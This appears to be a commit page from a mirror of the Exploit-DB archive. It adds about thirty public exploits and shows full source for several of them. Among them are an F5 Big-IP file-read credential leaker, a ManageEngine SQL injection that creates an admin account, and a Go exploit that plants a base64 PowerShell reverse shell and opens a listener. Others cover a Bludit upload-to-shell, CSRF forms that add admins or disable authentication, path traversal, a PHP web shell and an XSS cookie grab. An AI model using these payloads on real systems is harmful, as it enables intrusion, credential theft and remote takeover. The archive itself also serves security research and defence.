bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-07-27

Browse source 
32 changes to exploits/shellcodes

Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)
Nidesoft DVD Ripper 5.2.18 - Local Buffer Overflow (SEH)
Frigate Professional 3.36.0.9 - 'Pack File' Buffer Overflow (SEH Egghunter)
DiskBoss 7.7.14 - 'Reports and Data Directory' Buffer Overflow (SEH Egghunter)
Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter)
Port Forwarding Wizard 4.8.0 - Buffer Overflow (SEH)
Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter)
docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)
GOautodial 4.0 - Persistent Cross-Site Scripting (Authenticated)
ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection
INNEO Startup TOOLS 2018 M040 13.0.70.3804 - Remote Code Execution
UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin)
WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)
Bludit 3.9.2 - Directory Traversal
LibreHealth 2.0.0 - Authenticated Remote Code Execution
Online Course Registration 1.0 - Unauthenticated Remote Code Execution
elaniin CMS - Authentication Bypass
Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated)
PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting
Bio Star 2.8.2 - Local File Inclusion
Webtareas 2.1p - Arbitrary File Upload (Authenticated)
F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion
Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)
Socket.io-file 2.0.31 - Arbitrary File Upload
pfSense 2.4.4-p3 - Cross-Site Request Forgery
Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting
Rails 5.0.1 - Remote Code Execution

Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes)
Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)
Windows/x86 - Download using mshta.exe Shellcode (100 bytes)
This commit is contained in:
Offensive Security 2020-07-27 05:02:04 +00:00
parent dc7e147e70
commit e46d9f65ff
34 changed files with 2532 additions and 9 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

62
exploits/hardware/webapps/48694.txt Normal file
View file

@ -0,0 +1,62 @@
# Title: UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin)
# Date: 2020-07-23
# Author: LiquidWorm
# Product web page: http://www.medivision.co.kr
# CVE: N/A
<!--
UBICOD Medivision Digital Signage 1.5.1 CSRF Add Super Admin
Vendor: UBICOD Co., Ltd. | MEDIVISION INC.
Product web page: http://www.medivision.co.kr
Affected version: Firmware 1.5.1 (2013.01.3)
Summary: Medivision is a service that provides everything from DID operation to
development of DID (Digital Information Display) optimized for hospital environment
and production of professional contents, through DID product installation, image,
video content planning, design work, and remote control. This is a one-stop solution
that solves management at once.
Desc: The application interface allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests. This can
be exploited to perform certain actions with administrative privileges if a logged-in
user visits a malicious web site.
Tested on: Apache/2.4.7 (Ubuntu)
PHP/5.5.9-1ubuntu4.22
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5574
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5574.php
19.06.2020
-->
<html>
<body>
<form action="http://10.0.39.2/query/user/itSet" method="POST">
<input type="hidden" name="aa[_id]" value="" />
<input type="hidden" name="aa[uid]" value="testingus2" />
<input type="hidden" name="aa[name]" value="TestN" />
<input type="hidden" name="aa[pass]" value="123456" />
<input type="hidden" name="aa[email]" value="aa2@bb.cc" />
<input type="hidden" name="aa[mobile]" value="111-222-3333" />
<input type="hidden" name="aa[phone]" value="333-222-1111" />
<input type="hidden" name="aa[approval]" value="+" />
<input type="hidden" name="aa[grp]" value="3" />
<input type="hidden" name="od[]" value="name" />
<input type="hidden" name="ip" value="0" />
<input type="hidden" name="np" value="13" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

128
exploits/hardware/webapps/48711.py Executable file
View file

@ -0,0 +1,128 @@
# Exploit Title: F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion
# Date: 2019-08-17
# Exploit Author: Carlos E. Vieira
# Vendor Homepage: https://www.f5.com/products/big-ip-services
# Version: <= 13.1.3
# Tested on: BIG-IP 13.1.3 Build 0.0.6
# CVE : CVE-2020-5902
#!/usr/bin/env python
import requests
import sys
import time
import urllib3
import json
urllib3.disable_warnings()
global target
def checkTarget():
r = requests.head(target + "/tmui/login.jsp", verify=False)
if(r.status_code == 200):
return True
else:
return False
def checkVuln():
r = requests.get(target + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd", verify=False)
if(r.status_code == 200):
data = json.loads(r.text)
if(len(data['output']) > 0):
return True
else:
return False
else:
return False
def leakPasswd():
print("[+] Leaking /etc/passwd from server")
time.sleep(2)
exploit('/etc/passwd')
def leakHosts():
print("[+] Leaking /etc/hosts from server")
time.sleep(2)
exploit('/etc/hosts')
def leakLicence():
print("[+] Leaking /config/bigip.license from server")
time.sleep(2)
exploit('/config/bigip.license')
def leakAdmin():
print("[+] Leaking admin credentials from server")
time.sleep(2)
r = requests.get(target + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin", verify=False)
if(r.status_code == 200):
data = json.loads(r.text)
if(len(data['output']) > 0 ):
print(data['output'])
else:
print("[X] Admin credentials not found")
else:
print("[X] Fail to read file")
def exploit(file):
r = requests.get(target + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=" + file, verify=False)
if(r.status_code == 200):
data = json.loads(r.text)
print(data['output'])
else:
print("[X] Fail to read file")
def memoryLeak():
print("[!] Leaking tomcat process from server")
time.sleep(2)
r = requests.get(target + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/self/cmdline", verify=False)
if(r.status_code == 200):
data = json.loads(r.text)
if(len(data['output'])>0):
print("Command: " + data['output'])
def main(host):
print("[+] Check target...")
global target
target = "https://" + host
check = checkTarget()
if(check):
print("[~] Target is available")
vuln = checkVuln()
if(vuln):
print("[+] Target is vulnerable!")
time.sleep(1)
print("[~] Leak information from target!")
time.sleep(1)
leakPasswd()
leakHosts()
leakLicence()
leakAdmin()
memoryLeak()
else:
print("[X] Target is't vulnerable")
else:
print("[x] Target is unavailable")
if __name__ == "__main__":
if(len(sys.argv) < 2):
print("Use: python {} ip/dns".format(sys.argv[0]))
else:
host = sys.argv[1]
main(host)

95
exploits/java/webapps/48692.py Executable file
View file

@ -0,0 +1,95 @@
# Exploit Title: ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection
# Google Dork: intitle:"Applications Manager Login Screen"
# Date: 2020-07-23
# Exploit Author: aldorm
# Vendor Homepage: https://www.manageengine.com/
# Software Link:
# Version: 12 and 13 before Build 13200
# Tested on: Windows
# CVE : 2016-9488
#!/usr/bin/env python2
# App: ManageEngine Applications Manager
# Versions: 12 and 13 before build 13200
# CVE: CVE-2016-9488
# Vuln Type: SQL Injection
# CVSSv3: 9.8
#
# PoC Autor: aldorm
# Release date: 23-07-2020
# ./poc_CVE-2016-9488.py 192.168.123.113 8443 --create-user-hacker
# [*] Extracting all users:
# admin:21232f297a57a5a743894a0e4a801fc3
# reportadmin:21232f297a57a5a743894a0e4a801fc3
# systemadmin_enterprise:21232f297a57a5a743894a0e4a801fc3
# [*] Creating new user:
# User: hacker
# Password: admin
# [*] Verifing created user...
# Success.
import sys
import requests
import urllib3
import json
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
target = 'localhost'
def get_userpassword():
sqli = ' UNION ALL SELECT userid,CONCAT(username,$$:$$,password),NULL FROM am_userpasswordtable--'
r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False);
j = json.loads(r.text)
return j
def create_user():
sqli = '; INSERT INTO am_userpasswordtable VALUES (123123123, $$hacker$$,$$21232f297a57a5a743894a0e4a801fc3$$,NULL,NULL,$$21232f297a57a5a743894a0e4a801fc3$$,1); -- '
r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False);
sqli = ';INSERT INTO amdb.public.am_usergrouptable VALUES ($$hacker$$,$$USERS$$); -- '
r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False);
sqli = ';INSERT INTO amdb.public.am_usergrouptable VALUES ($$hacker$$,$$ADMIN$$); -- '
r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False);
return
def main ():
if not len(sys.argv) > 2:
print "Usage %s <target> <port> [--create-user-hacker]" % sys.argv[0]
print "e.g. %s manageengine 8443 " % sys.argv[0]
sys.exit(1)
global target
global port
target=sys.argv[1]
port=sys.argv[2]
print "[*] Extracting all users:"
j = get_userpassword()
for user in j["0"]:
print "\t %s" % user[1]
if len(sys.argv) == 4 and sys.argv[3] == '--create-user-hacker':
print "[*] Creating new user: \n\tUser: hacker \n\tPassword: admin"
create_user()
print "[*] Verifing created user..."
j = get_userpassword()
for user in j["0"]:
if user[1] == "hacker:21232f297a57a5a743894a0e4a801fc3":
print "Success."
return
print "User not created."
if __name__ == '__main__':
main()

281
exploits/multiple/webapps/48693.go Executable file
View file

@ -0,0 +1,281 @@
# Exploit Title: INNEO Startup TOOLS 2018 M040 13.0.70.3804 - Remote Code Execution
# Date: 2020-07-23
# Exploit Author: Patrick Hener, SySS GmbH
# Many credits go to Dr. Benjamin Heß, SySS GmbH for helping with php oddities and the powershell payload
# Advisory: SYSS-2020-028 (https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-028.txt)
# Vendor Homepage: https://www.inneo.co.uk/en/home.html
# Version: Startup TOOLS 2017/2018
# Tested on: Windows 10 x64
# CVE : CVE-2020-15492
/* This exploit was written by Patrick Hener, SySS GmbH
*/
package main
import (
"encoding/base64"
"fmt"
_ "fmt"
"io"
"io/ioutil"
"log"
"net"
"net/http"
"net/url"
"os"
"regexp"
"strconv"
"strings"
"golang.org/x/text/encoding/unicode"
)
type progress struct {
bytes uint64
}
func usage() {
fmt.Printf("Usage: %s lhost[192.168.x.x] lport[4444] url[http://ip:85] installDir[PROGRA~2/stools] \n\n", os.Args[0])
os.Exit(2)
}
func readFile(target string, traversal string, path string) (bool, string) {
success := true
request := fmt.Sprintf("%s%s%s", target, traversal, path)
resp, err := http.Get(request)
if err != nil {
fmt.Println(err)
}
if resp.Status != "200 OK" {
success = false
}
defer resp.Body.Close()
body, err := ioutil.ReadAll(resp.Body)
if err != nil {
fmt.Println(err)
}
return success, string(body)
}
func triggerFile(target string, traversal string, path string) {
request := fmt.Sprintf("%s%s%s", target, traversal, path)
_, _ = http.Get(request)
}
func poison(target string, traversal string, path string) (bool, string) {
success := true
request := fmt.Sprintf("%s%s%s", target, traversal, path)
resp, err := http.Get(request)
if err != nil {
fmt.Println(err)
os.Exit(2)
}
if resp.Status != "404 Not Found" {
success = false
}
defer resp.Body.Close()
fmt.Printf("[*] Poisoned: %s\n", path)
body, err := ioutil.ReadAll(resp.Body)
if err != nil {
fmt.Println(err)
}
return success, string(body)
}
func parseHostname(body string) string {
re := regexp.MustCompile("Service hostname:?.*")
hostnameRaw := re.FindAllString(body, -1)
hostnameSplit := strings.Split(hostnameRaw[0], ":")
hostnameTrimmed := strings.TrimSpace(hostnameSplit[1])
hostnameNoNewline := strings.Replace(hostnameTrimmed, "\n", "", -1)
return hostnameNoNewline
}
func customEscape(sequence string) string {
output := url.PathEscape(sequence)
output = strings.Replace(output, "+", "%20", -1)
output = strings.Replace(output, "=", "%3D", -1)
return output
}
func payloadEscape(sequence string) string {
output := url.PathEscape(sequence)
output = strings.Replace(output, "=", "%3D", -1)
return output
}
func transferStreams(con net.Conn) {
c := make(chan progress)
// Read from Reader and write to Writer until EOF
copy := func(r io.ReadCloser, w io.WriteCloser) {
defer func() {
r.Close()
w.Close()
}()
n, err := io.Copy(w, r)
if err != nil {
fmt.Printf("[%s]: ERROR: %s\n", con.RemoteAddr(), err)
}
c <- progress{bytes: uint64(n)}
}
go copy(con, os.Stdout)
go copy(os.Stdin, con)
p := <-c
fmt.Printf("[*] [%s]: Connection has been closed by remote peer, %d bytes has been received\n", con.RemoteAddr(), p.bytes)
p = <-c
fmt.Printf("[*] [%s]: Local peer has been stopped, %d bytes has been sent\n", con.RemoteAddr(), p.bytes)
}
func startServer(addr string) {
ln, err := net.Listen("tcp", addr)
if err != nil {
log.Fatalln(err)
}
fmt.Printf("[+] Now listening on %s\n", addr)
con, err := ln.Accept()
if err != nil {
log.Fatalln(err)
}
fmt.Printf("[+] [%s]: Connection has been opened. Press 'RETURN' once to start. Enjoy your shell, good sir.\n", con.RemoteAddr())
transferStreams(con)
}
func stage1(target string, traversal string, installDir string) string {
fmt.Printf("[*] Attacking target %s with assumed install path %s\n", target, installDir)
fmt.Printf("[*] Trying to read 'sut_server.log' to receive hostname of target at %s%s%s/software/LOG/sut_server.log\n", target, traversal, installDir)
path := fmt.Sprintf("%s/software/LOG/sut_server.log", installDir)
success, response := readFile(target, traversal, path)
if !success {
fmt.Printf("[-] It looks like %s%s%s is not there. Provide install_dir to try via args.\n", target, traversal, installDir)
os.Exit(2)
}
hostname := parseHostname(response)
return hostname
}
func stage2(target string, traversal string, installDir string, payloadFinal string) {
/* Stage 2 - poison log with php payload
Special about that is the length of payload junk has max restriction of about 200 characters
Thus we are splitting up the payload escaping the trash we don't need like
the 'n' is nesessary to escape DRIVE:\ which will be DRIVE:\n then
<?php $cmd=''; $foo= '
n'; $cmd.="part1"; $foo='
n'; $cmd.="part2"; $foo='
....
n'; system(cmd); ?>
*/
fmt.Println("[*] Poisoning Log with payload")
/* Start of the php code */
start := customEscape("<?php $cmd=''; $foo='")
success, _ := poison(target, traversal, start)
if !success {
fmt.Println("Poisoning failed. Exiting")
os.Exit(2)
}
/* Looping through payload */
offset := 0
pre := "n'; $cmd.='"
post := "'; $foo='"
for offset < len(payloadFinal) {
payload := payloadFinal[offset : offset+150-len(pre)-len(post)]
poisonPath := payloadEscape(fmt.Sprintf("%s%s%s", pre, payload, post))
success, _ = poison(target, traversal, poisonPath)
if !success {
fmt.Println("Poisoning failed. Exiting")
os.Exit(2)
}
offset += 150 - len(pre) - len(post)
if len(payloadFinal)-offset <= 150-len(pre)-len(post) {
break
}
}
/* Send last slice of payload to prevent from out of range error */
payload := payloadFinal[offset:len(payloadFinal)]
poisonPath := payloadEscape(fmt.Sprintf("%s%s%s", pre, payload, post))
success, _ = poison(target, traversal, poisonPath)
if !success {
fmt.Println("Poisoning failed. Exiting")
os.Exit(2)
}
/* End of the php code */
end := customEscape("n'; system($cmd); die; ?>")
success, _ = poison(target, traversal, end)
if !success {
fmt.Println("Poisoning failed. Exiting")
os.Exit(2)
}
}
func stage3(target string, traversal string, installDir string, hostname string) {
logFile := fmt.Sprintf("%s%s%s/software/LOG/sut_server_%s.log\\0.php", target, traversal, installDir, hostname)
fmt.Printf("[*] Triggering inclusion of %s\n", logFile)
triggerFile(target, traversal, logFile)
}
func stage4(lhost string, lport int) {
/* Listen for socket connection */
addr := fmt.Sprintf("%s:%d", lhost, lport)
fmt.Printf("[*] Starting reverse listener at %s\n", addr)
startServer(addr)
}
func main() {
if len(os.Args) < 4 {
usage()
}
lhost := os.Args[1]
lport, err := strconv.Atoi(os.Args[2])
if err != nil {
fmt.Println("lport has to be numeric")
os.Exit(2)
}
target := os.Args[3]
var installDir string
if len(os.Args) == 4 {
installDir = "PROGRA~2/stools"
} else {
installDir = os.Args[4]
}
/* Payload definition */
payload := fmt.Sprintf("$client = New-Object System.Net.Sockets.TCPClient('%s',%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()", lhost, lport)
/* Convert to base64 UTF-16LE */
encoder := unicode.UTF16(unicode.LittleEndian, unicode.IgnoreBOM).NewEncoder()
payloadEncoded, _ := encoder.String(payload)
payloadEncodedString := base64.StdEncoding.EncodeToString([]byte(payloadEncoded))
/* In webshell we would issue: powershell.exe -exec bypass -EncodedCommand <encoded_payload> */
payloadFinal := fmt.Sprintf("powershell.exe -exec bypass -EncodedCommand %s", payloadEncodedString)
/* Traversal to root - default depth would be 4 */
traversal := "/../../../../../../../../../../"
/* stage 1 - get hostname */
hostname := stage1(target, traversal, installDir)
fmt.Printf("[+] Hostname of target is: %s\n", hostname)
/* stage 2 - poisoning */
stage2(target, traversal, installDir, payloadFinal)
/* stage 3 - trigger */
go stage3(target, traversal, installDir, hostname)
/* stage4 - start listener */
stage4(lhost, lport)
}

132
exploits/multiple/webapps/48701.txt Normal file
View file

@ -0,0 +1,132 @@
# Title: Bludit 3.9.2 - Directory Traversal
# Author: James Green
# Date: 2020-07-20
# Vendor Homepage: https://www.bludit.com
# Software Link: https://github.com/bludit/bludit
# Version: 3.9.2
# Tested on: Linux Ubuntu 19.10 Eoan
# CVE: CVE-2019-16113
#
# Special Thanks to Ali Faraj (@InfoSecAli) and authors of MSF Module https://www.exploit-db.com/exploits/47699
#### USAGE ####
# 1. Create payloads: .png with PHP payload and the .htaccess to treat .pngs like PHP
# 2. Change hardcoded values: URL is your target webapp, username and password is admin creds to get to the admin dir
# 3. Run the exploit
# 4. Start a listener to match your payload: `nc -nlvp 53`, meterpreter multi handler, etc
# 5. Visit your target web app and open the evil picture: visit url + /bl-content/tmp/temp/evil.png
#!/usr/bin/env python3
import requests
import re
import argparse
import random
import string
import base64
from requests.exceptions import Timeout
url = 'http://127.0.0.1' # CHANGE ME
username = 'James' # CHANGE ME
password = 'Summer2020' # CHANGE ME
# msfvenom -p php/reverse_php LHOST=127.0.0.1 LPORT=53 -f raw -b '"' > evil.png
# echo -e "<?php $(cat evil.png)" > evil.png
payload = 'evil.png' # CREATE ME
# echo "RewriteEngine off" > .htaccess
# echo "AddType application/x-httpd-php .png" >> .htaccess
payload2 = '.htaccess' # CREATE ME
def login(url,username,password):
""" Log in with provided admin creds, grab the cookie once authenticated """
session = requests.Session()
login_page = session.get(url + "/admin/")
csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"',
login_page.text
).group(1)
cookie = ((login_page.headers["Set-Cookie"]).split(";")[0].split("=")[1])
data = {"save":"",
"password":password,
"tokenCSRF":csrf_token,
"username":username}
headers = {"Origin":url,
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Upgrade-Insecure-Requests":"1",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0",
"Connection":"close",
"Referer": url + "/admin/",
"Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding":"gzip, deflate",
"Content-Type":"application/x-www-form-urlencoded"
}
cookies = {"BLUDIT-KEY":cookie}
response = session.post(url + "/admin/",
data=data,
headers=headers,
cookies=cookies,
allow_redirects = False
)
print("cookie: " + cookie)
return cookie
def get_csrf_token(url,cookie):
""" Grab the CSRF token from an authed session """
session = requests.Session()
headers = {"Origin":url,
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Upgrade-Insecure-Requests":"1",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0",
"Connection":"close",
"Referer":url + "/admin/",
"Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding":"gzip, deflate"}
cookies = {"BLUDIT-KEY":cookie}
response = session.get(url + "/admin/dashboard",
headers=headers,
cookies=cookies
)
csrf_token = response.text.split('var tokenCSRF = "')[1].split('"')[0]
print("csrf_token: " + csrf_token)
return csrf_token
def upload_evil_image(url, cookie, csrf_token, payload, override_uuid=False):
""" Upload files required for to execute PHP from malicious image files. Payload and .htaccess """
session = requests.Session()
files= {"images[]": (payload,
open(payload, "rb"),
"multipart/form-data",
{"Content-Type": "image/png", "filename":payload}
)}
if override_uuid:
data = {"uuid": "../../tmp/temp",
"tokenCSRF":csrf_token}
else:
# On the vuln app, this line occurs first:
# Filesystem::mv($_FILES['images']['tmp_name'][$uuid], PATH_TMP.$filename);
# Even though there is a file extension check, it won't really stop us
# from uploading the .htaccess file.
data = {"tokenCSRF":csrf_token}
headers = {"Origin":url,
"Accept":"*/*",
"X-Requested-With":"XMLHttpRequest",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0",
"Connection":"close",
"Referer":url + "/admin/new-content",
"Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding":"gzip, deflate",
}
cookies = {"BLUDIT-KEY":cookie}
response = session.post(url + "/admin/ajax/upload-images", data=data, files=files, headers=headers, cookies=cookies)
print("Uploading payload: " + payload)
if __name__ == "__main__":
cookie = login(url, username, password)
token = get_csrf_token(url, cookie)
upload_evil_image(url, cookie, token, payload, True)
upload_evil_image(url, cookie, token, payload2)

35
exploits/multiple/webapps/48708.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: Bio Star 2.8.2 - Local File Inclusion
# Authors: SITE Team (Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi)
# Google Dork: N/A
# Date of Exploit Release: 2020-07-13
# Exploit Author: SITE Team
# Vendor Homepage: https://www.supremainc.com/en/main.asp
# Software Link: https://www.supremainc.com/en/support/biostar-2-pakage.asp
# Version: Bio Star 2, Video Extension up to version 2.8.2
# Tested on: Windows
# CVE : CVE-2020-15050
#!/bin/bash
# Exploit Title: Video Extension of Bio Star up to 2.8.1 Local File Inclusion Exploit
# Authors: SITE Team (Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi)
# Google Dork: N/A
# Date of Exploit Release: 13/7/2020
# Exploit Author: SITE Team
# Vendor Homepage: https://www.supremainc.com/en/main.asp
# Software Link: https://www.supremainc.com/en/support/biostar-2-pakage.asp
# Version: Bio Star 2, Video Extension up to version 2.8.1
# Tested on: Windows
# CVE : CVE-2020-15050
echo "*********** SITE TEAM *********************"
echo "*********** Video Extension of Bio Star 2 Local File Inclusion Exploit ***********"
echo "*********** Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi *********************"
if [ -z "$*" ]; then echo "Usage Example: ./exploit.sh https://website/ ../../../../../../../../../../../../windows/win.ini"
echo "*******************************************"
else
args=("$@")
curl -X GET --path-as-is -k ${args[0]}${args[1]}
fi

30
exploits/multiple/webapps/48712.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)
# Google Dork: https://www.shodan.io/search?query=sickbeard
# Date: 2020-06-06
# Exploit Author: bdrake
# Vendor Homepage: https://sickbeard.com/
# Software Link: https://github.com/midgetspy/Sick-Beard
# Version: alpha (master) -- git : 31ceaf1b5cab1884a280fe3f4609bdc3b1fb3121
# Tested on: Fedora 32
# CVE : NA
<html>
<body>
<!--
Clearing username and password disables authentication.
Requires a server restart for changes to take effect.
-->
<form action="http://1ocalhost:8081/config/general/saveGeneral" method="POST">
<input type="hidden" name="log_dir" value="Logs" />
<input type="hidden" name="web_port" value="8081" />
<input type="hidden" name="web_username" value="" />
<input type="hidden" name="web_password" value="" />
<input type="hidden" name="https_cert" value="server.crt" />
<input type="hidden" name="https_key" value="server.key" />
<input type="hidden" name="api_key" value="" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

59
exploits/multiple/webapps/48713.txt Normal file
View file

@ -0,0 +1,59 @@
# Exploit Title: Socket.io-file 2.0.31 - Arbitrary File Upload
# Date: 2020-07-02
# Exploit Author: Cr0wTom
# Vendor Homepage: https://www.npmjs.com/package/socket.io-file
# Software Link: https://www.npmjs.com/package/socket.io-file/v/2.0.31
# Version: <= v2.0.31
# Tested on: node v10.19.0, Socket.io-file v2.0.31, socket.io v2.3.0
# CVE: -
# Requirements: pip install socketIO-client-nexus==0.7.6
#!/usr/bin/env python
import sys
import json
import os
from socketIO_client_nexus import SocketIO, LoggingNamespace
def file_creation(RHOST, RPORT):
print ('Initiating connection...')
with SocketIO(RHOST, RPORT, LoggingNamespace) as socketIO:
print ('Creating file...')
# Example server running in /home/testuser/Documents/socket-app so customize the path appropriately
# Change the "name" option if you want to create an other file in an different path of the system
socketIO.emit("socket.io-file::createFile",{"id":"u_0","name":"../client/index.html","size":1,"chunkSize":10240,"sent":0,"data":{}})
# Example for server running with root access:
# socketIO.emit("socket.io-file::createFile",{"id":"u_0","name":"../../../../../root/.ssh/authorized_keys","size":1,"chunkSize":10240,"sent":0,"data":{}})
print ('Writing data to file...')
# Add the data you want to get written to the file
data = "Exploited by Cr0wTom"
json_string = json.dumps(data)
socketIO.once("socket.io-file::request::u_0", on_aaa_response)
socketIO.emit("socket.io-file::stream::u_0", json_string)
def on_aaa_response(*args):
print('on_aaa_response', args)
def print_usage():
print ('Socket.io-file <= 2.0.31 - Improper Input Validation in File Upload Functionality')
print ('Exploit Author: Cr0wTom (https://cr0wsplace.com)\n')
print ('Usage: python3 exploit.py <RHOST> <RPORT>')
print ('RHOST The target host IP address or domain.')
print ('RPORT The target host port number of the nodejs server.')
if __name__ == '__main__':
# ensure we have at least an IP and Port
if len(sys.argv) < 3:
print_usage()
sys.exit(1)
print ('Socket.io-file <= 2.0.31 - Improper Input Validation in File Upload Functionality')
print ('Exploit Author: Cr0wTom (https://cr0wsplace.com)\n')
file_creation(sys.argv[1], sys.argv[2])

16
exploits/php/webapps/48636.txt
View file

@ -7,18 +7,17 @@
1- Go to following url. >> http://(HOST)/cms/
2- Default username and password is admin:admin. We must know login credentials.
3- Go "Filemanager" and press "Upload file" button.
4- Choose your php webshell script and upload it.
3- Go to "Filemanager" and press "Upload file" button.
4- Choose your php web shell script and upload it.
((Example PHP Web Shell Code))
<?php echo "<pre>"; system($_GET['cmd']); ?>
PHP Web Shell Code == <?php system($_GET['cmd']); ?>
5- You can find uploaded file there. >> http://(HOST)/media/(FILE-NAME).php
6- We can execute a command now. >> http://(HOST)/media/(FILE-NAME).php?cmd=whoami
6- We can execute a command now. >> http://(HOST)/media/(FILE-NAME).php?cmd=id
(( REQUEST ))
GET /ritecms/media/webshell.php?cmd=whoami HTTP/1.1
GET /media/(FILE-NAME).php?cmd=id HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
@ -29,12 +28,13 @@ Connection: close
Cookie: icms[device_type]=desktop; icms[guest_date_log]=1593777486; PHPSESSID=mhuunvasd12cveo52fll3u
Upgrade-Insecure-Requests: 1
(( RESPONSE ))
HTTP/1.1 200 OK
Date: Fri, 03 Jul 2020 21:10:13 GMT
Date: Fri, 06 Jul 2020 20:02:13 GMT
Server: Apache/2.4.43 (Debian)
Content-Length: 14
Connection: close
Content-Type: text/html; charset=UTF-8
<pre>www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)

16
exploits/php/webapps/48690.txt Normal file
View file

@ -0,0 +1,16 @@
# Exploit Title: GOautodial 4.0 - Persistent Cross-Site Scripting (Authenticated)
# Author: Balzabu
# Discovery Date: 2020-07-23
# Vendor Homepage: https://goautodial.org/
# Software Link: https://goautodial.org/GOautodial-4-x86_64-Final-20191010-0150.iso.html
# Tested Version: 4.0 (Last relase as of today)
# Tested on OS: CentOS 7
# STEPS TO REPRODUCE:
# 1 - Log in as an agent
# 2 - Write a new message to user goadmin with:
Subject: Help me, I can't connect to the webphone <script src=1
href=1 onerror="javascript:alert(document.cookies)"></script>
Text: whatever you want
# 3 - Send and wait for goadmin to read the message... :-)

40
exploits/php/webapps/48698.txt Normal file
View file

@ -0,0 +1,40 @@
# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
# Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt
# Date: 2020-07-20
# Exploit Author: KBA@SOGETI_ESEC
# Vendor Homepage: https://www.icegram.com/email-subscribers/
# Software Link: https://pluginarchive.com/wordpress/email-subscribers/v/4-2-2
# Version: <= 4.2.2
# Tested on: Email Subscribers & Newsletters 4.2.2
# CVE : CVE-2019-19985
################################################################################################
# ___ ___ ___ ___ ___ #
# /\ \ /\ \ /\ \ /\ \ /\ \ ___ #
# /::\ \ /::\ \ /::\ \ /::\ \ \:\ \ /\ \ #
# /:/\ \ \ /:/\:\ \ /:/\:\ \ /:/\:\ \ \:\ \ \:\ \ #
# _\:\~\ \ \ /:/ \:\ \ /:/ \:\ \ /::\~\:\ \ /::\ \ /::\__\ #
